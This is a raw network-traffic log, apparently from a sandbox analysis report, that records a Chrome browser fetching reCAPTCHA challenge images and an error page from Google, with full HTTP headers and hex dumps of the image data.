                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC557INData Raw: 3c 89 ab 35 fd 7e bf d6 b6 27 3f da 4e ee af 04 4a c4 6d 05 47 6c f2 14 83 9e 01 00 8e e3 03 19 a9 ed 5a f0 8d cf 12 11 1b 6e 64 42 0c 64 9e 9c 7e 1d 7f c2 b3 cf 85 f4 4d c1 ad b5 bd 6a 12 24 de e6 3b a5 61 c9 c8 e0 8e 39 03 3c f6 3e 83 37 b4 8d 32 c2 ce ea 59 2f 35 1d 42 f6 15 85 d3 cb 28 85 84 a5 58 0f 98 61 88 07 19 5c e3 f9 12 50 8b 56 d3 fa b0 9a ba ba d3 e5 fd 79 7f c0 26 5b c9 2d a3 8e 35 f3 60 ca 86 da bf 2f 5e f8 2c 3f cf e5 45 67 0b af 12 ac b3 b4 57 7a 59 8a 49 9d d0 5c d9 06 91 54 9e 01 c3 7a 76 ed 45 65 2c 24 39 9f be bf 0f fe 44 53 af 28 49 a5 77 f2 67 90 f8 0f c5 be 22 f0 ef 8b 34 e5 d3 f5 4b 83 0d db 44 2e 21 95 cb c7 20 67 c1 ca fe 1d 7a d7 55 f1 3b 42 b1 b1 f1 0e a1 7b 07 99 e6 b2 99 fe 62 08 0d 9e dc 67 03 b0 ed 45 15 f4 11 ef ea 73 c9
                                                                                                                                                                                                                                                                  Data Ascii: <5~'?NJmGlZndBd~Mj$;a9<>72Y/5B(Xa\PVy&[-5`/^,?EgWzYI\TzvEe,$9DS(Iwg"4KD.! gzU;B{bgEs
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  70192.168.2.1649799142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC858OUTGET /recaptcha/api2/payload?p=06AFcWeA6dVEIzpM3JHrpCYl9jcz_iqJn4_8jFXNv0yxm-6V4bX-xWihKEepTmtHOMOHVz3RjBTrXT7dN7gYxYTmvM9pch9frD_2Mt3aIGC1iHFdAculPLW-E-pvMwfXqdU-eFFIvfmgYdo6khSBA0SncV71vkgo0b4sCXigzgrEIRJFzMpiO5gqUj7ZosUIYXEi-OK8ItEStpAw4diRUHM1nMSnHfpBwisw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=6666e44f208ad0c5 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:19 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:19 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC697INData Raw: 31 36 61 33 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 16a3JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1378INData Raw: 04 ff 00 4c 64 1a 8a 1b 69 a3 62 a1 4c 6d 1a b9 31 b9 03 68 fe 32 db 88 38 24 75 18 c7 38 a9 93 b2 ec 8c b9 53 5a ef b7 f5 af f5 eb ba 5c ca 41 92 e3 74 4a bb bc d9 04 cc 4b 02 79 00 7c b8 3f 97 4c 74 e7 2d b9 b5 f2 a4 60 11 5d dc 06 74 08 31 12 ff 00 10 24 9c 63 69 27 a1 18 03 3c 63 36 59 a3 97 cc 9c 1d 92 ce a5 50 01 b9 10 e0 30 da 73 f3 1e a4 00 0f 7c e7 bd 50 6d e3 50 32 b2 a8 5c c8 a1 71 e6 a8 c3 10 36 f7 04 e4 6d ea 07 38 c0 cd 2a 8b 66 b6 fe bf 3f ea da 96 b9 9c 6d d4 94 18 d5 1d cc 6f 25 a4 ca 16 49 3c d6 21 d7 2c 40 60 71 81 86 e8 0f e3 cd 32 e6 76 86 e1 ee e7 b8 75 97 e4 70 d8 1b b9 04 16 23 8c 01 bf 03 23 f2 e6 a4 f9 77 44 3c b0 ca 40 63 bc 02 e5 b1 92 0a f4 24 61 4f 4c 75 ee 78 8a 21 20 84 db a9 8b 7b e4 49 b8 61 9c 93 91 d0 f5 c7 61 d7 af 5c
                                                                                                                                                                                                                                                                  Data Ascii: LdibLm1h28$u8SZ\AtJKy|?Lt-`]t1$ci'<c6YP0s|PmP2\q6m8*f?mo%I<!,@`q2vup##wD<@c$aOLux! {Iaa\
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1378INData Raw: 08 c4 42 60 58 b3 ef 42 46 47 1d f2 07 73 c9 27 d6 b3 e1 7f 14 de cf 32 a6 b1 70 1d 9d 91 58 cc 40 e5 8e 71 f8 e3 3d fe b8 a9 e5 b6 ad f6 e9 a7 f5 b0 bd ae 89 47 6f f8 6d 3d 74 f9 1d 04 5a 57 c4 08 5e 64 62 92 91 21 05 a3 9c a0 c8 c0 3c 06 f5 07 fc f1 45 73 d7 16 5a ff 00 9a df 6b d6 27 b9 9b 24 b3 5b 5e 3e c1 93 9c 74 f7 fc 88 a2 93 c3 e1 e5 ab 93 b9 c3 53 17 4e 32 6a 51 bb ff 00 b7 7f 53 a4 d5 3c 53 63 a4 d8 58 5e 4f 7f 14 ab 79 99 a2 55 47 6f 93 0a 32 46 41 e0 a9 3c fa 1e f4 c8 be 20 68 57 97 82 dc 4b bc f9 88 b0 a3 5a b6 d9 24 00 7d ee 70 01 3d 4f a0 cf bd 70 5e 3d 30 b6 91 e1 e6 de 43 1b 26 24 1c 3a 80 76 8e 39 e3 b8 fc 01 eb 5c d6 9b 2a 4d ab c0 c6 4d 85 a4 5f 9d 49 2d c9 c7 07 d7 d0 7a 63 8e 2b a6 e9 ea fc ff 00 af 3f cc d6 dc ca ea fe b6 d7 fa fe
                                                                                                                                                                                                                                                                  Data Ascii: B`XBFGs'2pX@q=Gom=tZW^db!<EsZk'$[^>tSN2jQS<ScX^OyUGo2FA< hWKZ$}p=Op^=0C&$:v9\*MM_I-zc+?
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC1378INData Raw: 8e 41 df b8 93 8c 9d bc f3 cf e3 59 4d 71 69 a5 fc 41 bd bc 90 1b 6b 7f b5 4d 27 ef 98 e0 7c 84 12 5b 3d f9 ee 09 e8 33 52 5d 5d 5a ea d3 3e a1 60 d2 88 ee 14 48 21 de 30 84 67 20 a8 1f 36 32 72 d9 04 7f 3c 64 a2 a0 ac 2a 6b a6 ff 00 35 fd 3f 2d ff 00 cf 56 d2 08 74 e8 8c 76 f7 41 63 19 dc 16 7d cd 83 9e 7a f2 48 19 e8 3a e7 3c 73 1b 6a 1a 42 ca d6 d1 5c c9 74 c1 0f 41 b9 65 72 06 00 c0 3d 3d bb 91 f8 e4 c1 67 2c 8d 12 79 f2 5d 49 b5 bc b0 40 2c ef c1 24 1e a3 19 f5 fc b1 8a 6d b8 49 22 1b c5 b4 68 aa 8a 81 9b 6a 15 27 05 1c 0e 83 e5 1d 33 c1 e7 ad 66 f9 5b 6f fe 0f e8 74 c6 9b 97 ba bf a7 f3 df f0 d7 cc be da c5 ac c2 dd 45 a3 cb 14 8c 07 9a c8 55 9f 71 f9 72 73 ce 57 bf d3 9e a6 9c fa bd eb 18 67 ff 00 47 b7 74 90 aa 7e f0 bb a8 2d 92 a4 9c 80 01 c0 1c
                                                                                                                                                                                                                                                                  Data Ascii: AYMqiAkM'|[=3R]]Z>`H!0g 62r<d*k5?-VtvAc}zH:<sjB\tAer==g,y]I@,$mI"hj'3f[otEUqrsWgGt~-
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC972INData Raw: 2c b2 5c 4a 11 7e 5c 12 72 39 04 03 8c 1e fd 68 52 be bf f0 4a 8c 1b 7a 9e 69 69 17 da 23 55 8e 26 c9 60 d2 10 42 fc a7 68 1c 75 3d 57 f3 ab 91 58 c9 33 84 4f 9d 86 d2 b8 90 f1 93 85 27 8e 43 67 ff 00 af cf 1e 93 36 9b e0 3d 26 c4 ca d7 b3 eb 72 06 f2 a3 58 94 c7 18 40 0f 43 9e 83 38 38 3d 01 a8 9b c5 77 36 70 1b 4f 0f 69 96 56 26 55 76 67 31 09 5d ce 41 39 39 e3 a8 3c 8c 67 1c f3 4d b6 9f bd f7 7e 64 ae 4b ea 62 5a f8 1f 58 60 b7 53 5a fd 96 c8 e5 9d ee 25 f2 ca 46 33 f3 73 82 33 c9 03 1d 8d 69 3e 97 e1 3d 2c c8 35 3d 61 b5 29 14 34 72 a5 92 71 23 6e f9 7f 78 7a 8e 07 19 c8 c7 1d 6b 16 ee f6 fe fe e9 64 be bd 96 e2 64 c4 8a 66 77 1b 79 fb a4 37 03 19 6e a3 be 01 39 35 0b 41 1e 21 91 e1 11 c4 a9 e5 e6 45 2c c3 2c 36 b8 c9 07 b6 70 31 d4 e4 f4 14 d5 95 a2
                                                                                                                                                                                                                                                                  Data Ascii: ,\J~\r9hRJzii#U&`Bhu=WX3O'Cg6=&rX@C88=w6pOiV&Uvg1]A99<gM~dKbZX`SZ%F3s3i>=,5=a)4rq#nxzkddfwy7n95A!E,,6p1
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  71192.168.2.1649801142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:20 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  72192.168.2.1649800142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC1190OUTGET /recaptcha/api2/payload?p=06AFcWeA57XaTzOr6lK-Qv7FFr_QBTPg0S8x0jkWwDyC7I6UHEXC_XFxPaNqt8KR5xYQPoeFcfsjB-M6tXRtBbavQjQWJCF7mZN9_aP-wLP44nVLa4RsNQZUeJDb29hxYKY4rlLOPTs_Td0kCcdGPGiv5xvNGkdS21kUFEBG7OcPIeL4i8e4t6Asyt6YxmP6fiTpBCxz4DxQ7Ys1AsZnDHJBqenX9jed7huQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=d54059ff5f6fc7f7 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:20 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:20 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC697INData Raw: 38 32 39 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14
                                                                                                                                                                                                                                                                  Data Ascii: 829JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC1378INData Raw: d4 63 81 51 c9 24 91 2a 6d 4d d9 ee 39 c5 69 1d 60 d0 27 d4 9d de 22 59 01 6d c3 8c 8e f5 3c 0a a7 9c 83 8e c6 a1 b4 82 7b db 69 e7 8a 32 45 ba 86 72 38 e0 d3 6c 26 24 9c 60 9f 7a 71 4e d7 0b 97 59 94 3e d0 38 fe 2f 6a b9 6f d7 a9 23 b0 35 02 c6 25 19 38 07 da ac 27 c9 c6 2b 5b f4 27 7d 0b 91 ae 17 ad 58 8c 90 31 83 54 55 f0 3a e6 a7 12 12 3d 29 ad 4a 4c b6 18 8e 2a 39 9b 9e 2a 03 29 c7 5a 63 48 71 80 73 45 8a 43 99 ce 7a d1 4c c1 6e 70 68 a2 c3 bb 3c ca d6 5b af 2b 08 1a 43 9c 81 8c d4 90 ca d2 5d 16 98 f9 47 18 23 18 3f 95 4e 91 c8 fb 11 08 40 b8 e4 71 56 27 87 78 52 aa cc c3 f8 cf 5a 8e 64 d9 8d b5 25 d2 ee 24 8a 50 70 58 8f 97 f0 fa 54 f2 b1 72 59 5b 05 8e 76 67 81 51 d8 40 7e f1 62 08 ea 2a dc 90 e0 ae 05 2b 5d 97 08 e8 76 bf 0f ac 82 f8 6e e2 e6 74
                                                                                                                                                                                                                                                                  Data Ascii: cQ$*mM9i`'"Ym<{i2Er8l&$`zqNY>8/jo#5%8'+['}X1TU:=)JL*9*)ZcHqsECzLnph<[+C]G#?N@qV'xRZd%$PpXTrY[vgQ@~b*+]vnt
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC21INData Raw: 9a 28 a0 60 49 a7 0a 28 a4 27 b0 e0 38 a2 8a 28 11 ff d9 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: (`I('8(
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  73192.168.2.1649802142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC858OUTGET /recaptcha/api2/payload?p=06AFcWeA7xha3gxL0LyuWF8xqJSoCy9aQ-CZnuJeBttoz9_4u-0dr2ooWnm-XyId997e5APa7ifIuB7pzFl0Ld1JHgMi727Mh_bXvh33TfwJ0QP4-jBMaOIGMY9nVllrV0ucFNLw_YWa5NAg0HBGl7nBIePGFmWIlko0bVYW4FzRKb_r8YRN5GuA3Fdmj1g-URC-WVZUOlHiPBV-qRB8c5HFucXS6ADUe7iw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=e16caff0ee415144 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:20 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:20 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
